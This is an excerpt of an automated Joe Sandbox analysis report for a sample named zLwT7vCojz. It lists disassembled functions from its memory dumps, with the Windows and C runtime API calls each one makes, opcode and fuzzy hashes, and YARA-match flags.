                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d30c74e071694a417726272b0ad9aec889f249fd02ec2d8ca2e4928fce66191a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7311C472A041249BCB04EBA5DC46AEE7B74EF84358F10457FF911B72D1DB38AA01C7A9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00403415
                                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                                              • Opcode ID: d387dd142d687c27f104ba710c4403ca8660f45ee4346cae019e0b35d2893a61
                                                                                                                                                                                                                                              • Instruction ID: b08fc69a2d58a520d61ed45628bf7838f6025f71e81aad9ede0327bacf9a49bc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d387dd142d687c27f104ba710c4403ca8660f45ee4346cae019e0b35d2893a61
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F11B2329002249BCB05EFA4C845AEE7B74EF84319F10457EF811772D1DB789A00CB99
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040365A
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                                              • Opcode ID: 4066e37fb53cc8e902d0eadf6d54435010486020b5249de0d597e5de03c7bd77
                                                                                                                                                                                                                                              • Instruction ID: 35ba7fbacb3ba011adbce412d2c2d1e287e189574cae76d7885ddda8e317074f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4066e37fb53cc8e902d0eadf6d54435010486020b5249de0d597e5de03c7bd77
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F11C432A001289BCB14EFA5C845AEE7B74AF84319F10457FF811773D1DB389A04CB99
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,04336BF7,00000001,00000001,?), ref: 04336A00
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,04336BF7,00000001,00000001,?,?,?,?), ref: 04336A86
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04336B80
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 04336B8D
                                                                                                                                                                                                                                                • Part of subcall function 04337CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04337CDE
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 04336B96
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 04336BBB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                                                              • Opcode ID: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
                                                                                                                                                                                                                                              • Instruction ID: a328a15a0169734116cceb485b0a23e0e3347b05e6dec34b9eb9628cf5678b05
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4551D1B2600216BFEB358F65CC42EAB77A9EF40765F156268FD04DB140EB34FC408AA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4189289331-0
                                                                                                                                                                                                                                              • Opcode ID: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
                                                                                                                                                                                                                                              • Instruction ID: 80bbfc0670132825bdf2be2c4ddef14a0191dffd6db0463923bb3564b0f937bd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E510972900605BBEF34AF698C80EBE77A8EF4A327F106219F815D61D1EF31F5018A64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4189289331-0
                                                                                                                                                                                                                                              • Opcode ID: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
                                                                                                                                                                                                                                              • Instruction ID: 718bfb1be64fddbb13d287cf5bb67825c1c0e481ba6d94f2ea4f00e94f797b17
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5851FB32504205ABDF249B598C41EEF77A9AF49364F10421FF915962A1FB3DE9C0C66C
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0432CC13,0432A4C2), ref: 0432CC2A
                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0432CC38
                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0432CC51
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,0432CC13,0432A4C2), ref: 0432CCA3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                              • Opcode ID: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
                                                                                                                                                                                                                                              • Instruction ID: ed122083127ee4cf72c7b95943cfa982e389b6859875a75022e7edef77524929
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E01843220A7355EA7682A75BF88AAF3768EF016797203339E624960F0FF5168025588
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0040C9AC,0040A25B), ref: 0040C9C3
                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D1
                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9EA
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,0040C9AC,0040A25B), ref: 0040CA3C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                              • Opcode ID: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
                                                                                                                                                                                                                                              • Instruction ID: 4d2dab335d40ef71c1f126db0958835d547db160ba3e5df8986dc94b5f1501a5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5001C072609619AEE63857B5BCC5B2B3665DB01378720033FF220B02F1EF694C06558C
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                                              • Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                              • Instruction ID: 5e45d77dad2263f1a8880f22311913f30f667b2b9e9461078ca51571e0da64ae
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BF0F471648A003EE23233757C0EF2F25199FC1727F256238F524E62D0EF20F8024568
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                                              • Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                              • Instruction ID: ed1cfbe94671cc1e241a5e305b234748cf7dab698c9013e935629a888f8688e1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CF0A431784B1066C6227B36BC0AFDF26299FC1765B27062FF518A2291EF2CD882815D
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000), ref: 0041729F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                              • String ID: -@
                                                                                                                                                                                                                                              • API String ID: 3177248105-2564449678
                                                                                                                                                                                                                                              • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                              • Instruction ID: 8997a9a2b537593604dca6541f5acb5d3abab1905c8fb23eed40c845f27096e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED01473634A2239BC7314B68AC44A9B3BA8BF117607114675F90AE3240DB34D843C6EC
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 04321B30
                                                                                                                                                                                                                                              • std::system_error::system_error.LIBCPMT ref: 04321B3F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                              • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                              • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                              • Instruction ID: 21ec141acd897872a1c2046023156073dce0692ff2dc72ec57cb6b54e0047524
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9F0F67190437C73DF14BA909F40FE97AAC9F08394F14A025ED4467180E7B57A0482E8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                              • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                              • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                              • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                              • Instruction ID: 07e54f61a89a03d5a6d9a7cf2ef478e5e050e13e4079476904521aa99984b06a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78F0C26290035C63DB10B9659C42FEA7B989F09358F24C03BFD45761E1D77D5A04C6ED
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                              • Instruction ID: a34188c843a8f46fdd92a2bf3fbb0ddbd7449eedd0cf1b17e067f3e400b11719
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CF0A930B01218BBDB109F50DC05B9E7F78EF44752F404069F809A2290DF344E45C79C
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                              • Instruction ID: 09c64ece9e7e754056908cbdde54ca677f7b4e69a64c618a48c4fffa52d2f0c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A71C075A012169FDF21EF54CC84ABFBBB9EF41316F146229F89167290DB70B941CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                              • Instruction ID: 9cd28828fb54a95b18f1d3d04b552151bab261da8883c7926ca586bf812e9daa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA71B1359022569BCB218B59C884AFFBB75EF41350F14422BE914A7380E7789CE1C7EA
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3033488037-0
                                                                                                                                                                                                                                              • Opcode ID: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
                                                                                                                                                                                                                                              • Instruction ID: 55bf17d4dcb194249b5fecb1e34a5dd3d40739df3368d47199f68f92a951084d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A351D372A00704AFEB20DF69DC81B6A77F4EF6972AF141569E849DB250E735FA01CB40
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004146D7
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004146EE
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041470D
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414728
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041473F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3033488037-0
                                                                                                                                                                                                                                              • Opcode ID: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
                                                                                                                                                                                                                                              • Instruction ID: c2206efc5f66e5100cf0e8c7e25606760de7fe79bb98949094d9bf3f90d27d39
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B51D471A00304AFDB20DF65D881BAA77F4EF99728F15056EE809D7690E739E981CB48
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
